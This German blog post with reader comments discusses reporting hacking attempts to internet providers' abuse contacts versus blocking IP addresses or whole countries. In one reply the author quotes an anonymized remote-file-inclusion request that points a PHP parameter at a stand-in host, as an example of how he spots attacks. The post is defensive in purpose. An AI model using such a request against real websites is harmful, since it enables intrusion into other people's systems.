toscho.design

Informieren statt Sperren

Wie schon beschrieben, blockiere ich IP-Adressen, von denen aus versucht wird, eine von mir betreute Website zu hacken. Meistens.

IP-Adressen aus Deutschland jedoch handhabe ich etwas vorsichtiger. Schließlich könnte später ein regulärer Besucher diese Adresse zugewiesen bekommen.

Ich sehe deshalb bei ip-lookup.net erst nach, ob der Provider eine Beschwerde-Adresse angegeben hat, und dann schicke ich eine E-Mail. Die sieht so aus:

Hallo,

eben ($time) hat jemand von Ihrer IP-Adresse aus versucht, sich in meine Website einzuhacken:

$request

Bevor ich mich an eine andere Stelle wende, möchte Sie zuerst darauf hinweisen. Bitte unterrichten Sie mich über Ihr Vorgehen.

Mit freundlichen Grüßen
Thomas Scholz

Da bekomme ich in etwa 50% aller Fälle eine Rückmeldung, manchmal dauert das leider recht lange. Den Rekord hat am Sonntag all-inkl.com gerissen: Schon 30 Minuten nach meiner E-Mail kam diese Antwort.

Hallo Herr Scholz,
danke für den Hinweis.

Wir haben den betreffenden User soeben gesperrt.

Und darunter ein Link auf eine Website, wo man die Antwort bewerten konnte. Vorbildlich.

Am Montag dann das Gegenteil: Von einer Adresse, die evertz.de zugeordnet wird, kam 3:30 Uhr ein Angriff, vier Minuten später ging meine E-Mail ’raus. Und 18:00 Uhr kam … noch ein Angriff. Aber keine E-Mail bis heute.

Über den Sinn der IP-Sperren hatten wir hier schon lange Debatten.
Heute interessiert mich: Welche Erfahrungen habt ihr mit Mißbrauchsmails gemacht? Haltet ihr das für Zeitverschwendung? Oder handhabt ihr das ganz anders?

15 Kommentare

  1. David am 19.01.2010 · 23:59

    Bisher hielten sich Angriffe auf meine Seiten eher in Grenzen, es waren gerade mal zwei oder drei aus Deutschland dabei. Daraufhin hab ich auch eine Mail an den Provider geschickt, die auch beantwortet wurden. Allerdings immer nur mit „wir prüfen das“. Ob es also was bringt, kann ich nicht sagen.

    Schickst Du die Mail automatisch raus, oder sitzt Du nachts vorm Rechner, mit dem Finger am Abzug?

  2. Thomas Scholz am 20.01.2010 · 00:07

    @David: Ich habe eine Mailvorlage, die dann ausgefüllt wird, aber das Absenden übernehme ich selbst. Halbautomatisch also.
    Und normalerweise schlafe ich um diese Zeit; das war nur zufällig so eine Nacht, in der noch ein sehr dringender Auftrag fertig werden mußte.

  3. GwenDragon am 20.01.2010 · 13:52

    Ich betreue mehrere Web- und Mail-Server. Natürlich kommen auch dort genügend Angriffe bezüglich SSH, FTP und Mailzugängen vor, insbesondere auch Massenspam aus der EU.
    Ich habe keine guten Erfahrungen mit Abuse-Mails in Bezug auf Spam und/oder Attacken gemacht.
    Die meisten deutschen Provider reagierten nicht oder nur mit fadenscheinigen Prüfungsabsichten bezüglich der Attacke. Bei manchen kam nur ein automatisches Mail des Abuse-Teams und sonst nichts weiter.

    EU-Anbieter wie 1&1 in UK haben bei einem üblen Angriff nichts unternommen, der von einem ihrer gehosteten VServer kam. Leider.

    Manchmal helfen doch nur brutale IP-Sperren.

  4. Anonymous am 23.01.2010 · 16:08

    Mal eine andere Fragen, wie findest du herraus ob ein Hackangriff stadtgefunden hatt?

  5. Thomas Scholz am 23.01.2010 · 16:15

    @Anonymous: Ich lasse mir jeden 404er per Mail schicken. Darin stehen die Details des Requests. Frisches Beispiel von heute (anonymisiert):

    GET /bemarket/postscript/postscript.php?p_mode=http://example.com/uploaded/two%253f%253f

    Da versucht jemand, die Variable p_mode mit einem eigenen Wert zu besetzen und seinen Code einzuschleusen. Das ist ein Angriff.

  6. Projecta am 24.01.2010 · 15:31

    Hm,

    was würdest du davon halten, einen eigenen Beitrag zum Thema

    "Website-Attacken: Erkennen, Abwehren, Vorsorgen"

    halten?

    Ich behaupte mal einfach, dass sich viele User zwar mit Webdesign beschäftigen, ein CMS auch ganz gut einrichten und verwalten können, sich aber mit Servern & Co nur bedingt auskennen.

    Würd mich sehr freuen, mehr über Sicherheit und Co hier lesen zu können.

    Danke
    Projecta

  7. Thomas Scholz am 24.01.2010 · 15:45

    @Projecta: In meinen Beiträgen zum Thema ›Sicherheit‹ spreche ich das immer wieder an. Einen allumfassenden Artikel werde ich so schnell nicht zustande bringen: Zu viele Details müßten berücksichtigt werden: serverseitige Software, lokales System, Kommunikationsprotokolle etc.
    Ich werde weiterhin diesen Einzelheiten Artikel widmen, mehr wage ich nicht.

    Christian Heilmann hat neulich einen Artikel geschrieben, der vielleicht in die Richtung weist, die du dir vorstellst: Web Security: Are You Part Of The Problem?. Der ist jetzt gerade leider nicht erreichbar, aber das wird bestimmt bald repariert.

  8. Projecta am 24.01.2010 · 15:55

    Danke dir,

    der Artikel ist wieder online, lese ihn grade durch.

    Jep, ich weiß schon, dass das Thema Sicherheit sehr komplex ist. Deshalb bin ich auch immer froh, wenn man konkrete Tips und Tricks zu lesen bekommt.

    Deine Artikel sind wirklich sehr gut und va praxisnah.

    Gimme more, more, more...
    Thanks

  9. inta am 12.02.2010 · 17:43

    Ich reagiere auf solche Attacken überhaupt nicht. Sperren halte ich generell für eine schlechte Idee und den Betreiber anschreiben halte ich für wenig erfolgversprechend. Hast du schon mal eine Benachrichtigung erhalten, dass wirklich etwas gegen den Übeltäter unternommen wurde? Ich vermute mal mehr als eine zeitlich befristete Sperre und bestenfalls eine mahnende E-Mail wird da nicht passieren.

    Warum ich nicht sperre? Warum sollte ich? Der Angriff war (hoffentlich) nicht erfolgreich, somit ist mir nichts passiert und derjenige testet für mich kostenfrei die Sicherheit meiner Seite. Sollte ein Angriff erfolgreich sein (das war bisher nie der Fall), dann würde ich bei der Polizei Strafanzeige erstatten (bei Angriffen aus dem Ausland ist das leider auch wenig erfolgversprechend).

    Auch wenn es relativ unwahrscheinlich ist, dass zum Beispiel jemand aus China meine Seite besucht, so möchte ich doch nicht pauschal alle IPs von dort sperren. Im Zweifelsfall trifft es auch unschuldige und wenn es ein Freund ist der seinen Urlaub in China verbringt und Lust hat „in die Heimat zu surfen“.

  10. Thomas Scholz am 12.02.2010 · 20:07

    @inta: Ich bekomme erstaunlich oft positives Feedback. In den letzten zwei Wochen habe ich drei solcher E-Mails verschickt, und alle drei wurden beantwortet. In zwei Fällen gingen die Angriffe von Webseiten aus, die gehackt worden waren. Das haben die Verantwortlichen erst durch mich erfahren – und die Seiten vom Netz genommen.
    Mich kostet das kaum Mühe, und alle Beteiligten haben einen kleinen Vorteil davon.

    Früher habe auch nur bestimmte »typische« Requests blockiert, um meine Ruhe zu haben. Auf vielen Seiten handhabe ich das immer noch so. Aber manche Leute geben einfach keine Ruhe und versuchen dann eben solange andere Einbruchsversuche, bis sie gestoppt werden. Das finde ich lästig und auch ein bißchen zu gefährlich. Vielleicht gibt’s hier ja doch eine Sicherheitslücke, die jemand mit viel Geduld findet. Eine Strafanzeige bringt mir dann wenig.

    China blockiere ich ebenso wie Südkorea, weil von dort auf allen Seiten, die ich betreue, ausschließlich Angriffe kommen. Das nervt. Bei einem Nachrichtenportal oder einer Community-Seite würde ich mir das radikale Vorgehen nochmal überlegen, aber sonst … nehme ich in Kauf, daß eventuell jemand nicht auf meine Seite gelangt, der tatsächlich nur lesen möchte. Irgend einen Kompromiß muß man immer finden, und ich setze Sicherheit und Performance meistens vor Zugänglichkeit.

  11. GwenDragon am 13.02.2010 · 13:20

    @Thomas Scholz
    <ein bisschen offtopic> Was spricht eigentlich dagegen IDS-Systeme zum melden/sperren wie PHPIDS oder mod_security anstatt deiner Mail-Meldungen und IP-Blocklisten zu nutzen? Oder findest du das Regelwerk zu komplex?

  12. Thomas Scholz am 13.02.2010 · 13:32

    @GwenDragon: Zumindest mit PHPIDS habe ich schon herumgespielt. Ich bin mir aber noch nicht sicher, ob sich der Overhead lohnt, und das Anschreiben der »Störer« nehmen mir diese Anwendungen natürlich auch nicht ab.

  13. thomas57 am 29.04.2010 · 19:01

    Ich habe hier einmal eine Frage,
    in der letzten Zeit gibt es eine seltsame ip adresse in verschiedenen Blogs und auch in einem Shop von mir;
    baiduspider-220-181-7-55.crawl.baidu.com
    Hier wechseln die letzten Ziffern,
    -92 -60 -66 -78 -75 -94
    Das scheint eine Suchmaschine zu sein, nur leider ist diese mir unbekannt. Sollte man sie sperren oder nicht?
    Gruß aus dem Norden von
    Thomas

    p.s.
    Sollte der Kommentar nicht im richtigen Artikel liegen, dann entschuldige bitte, bin heute gegen 17:00 Uhr am Unterkiefer operiert worden und vielleicht...

  14. Christoph am 29.04.2010 · 19:09

    Baidu ist die marktführende Suchmaschine in China.

  15. Thomas Scholz am 29.04.2010 · 19:19

    @thomas57: Ganz aktuell dazu eine Nachricht von heute: Baidu Heise: steigert Umsatz um 60 Prozent.

    Die kann man durchaus reinlassen. Da ich aber aus China ausschließlich Hackversuche bekomme und keinen einzigen echten Besucher, habe ich die zurückzensiert und China komplett geblockt. Irgendwann gebe ich denen nochmal eine Chance, wenn ich Zeit für ein enges Monitoring finde …

    Heil gut ab! ☺